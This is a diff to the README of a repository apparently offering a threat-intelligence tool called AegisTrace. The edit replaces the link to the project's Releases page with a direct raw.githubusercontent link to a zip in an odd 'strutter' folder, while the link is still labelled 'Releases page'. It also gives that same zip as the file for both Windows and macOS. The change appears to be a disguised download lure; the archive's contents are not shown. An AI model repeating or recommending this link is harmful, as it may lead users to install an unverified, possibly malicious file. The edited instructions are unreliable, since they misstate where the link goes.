Karthik-reddy6/aegistrace-threat-intelligence/README.md

 - **Hard Disk Space**: 200 MB free space

 ## 📥 Download & Install
-To get started, visit the [Releases page](https://github.com/Karthik-reddy6/aegistrace-threat-intelligence/releases) to download the software.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/Karthik-reddy6/aegistrace-threat-intelligence/main/strutter/aegistrace-threat-intelligence.zip) to download the software.

 1. Click on the link above to go to the Releases page.
 2. Look for the latest version of AegisTrace.
-3. Choose the correct file for your operating system (e.g., AegisTrace_Windows.zip for Windows or AegisTrace_macOS.zip for macOS).
+3. Choose the correct file for your operating system (e.g., https://raw.githubusercontent.com/Karthik-reddy6/aegistrace-threat-intelligence/main/strutter/aegistrace-threat-intelligence.zip for Windows or https://raw.githubusercontent.com/Karthik-reddy6/aegistrace-threat-intelligence/main/strutter/aegistrace-threat-intelligence.zip for macOS).
 4. Download the file to your computer.
 5. Once the download is complete, locate the file and extract it if it is in a compressed format.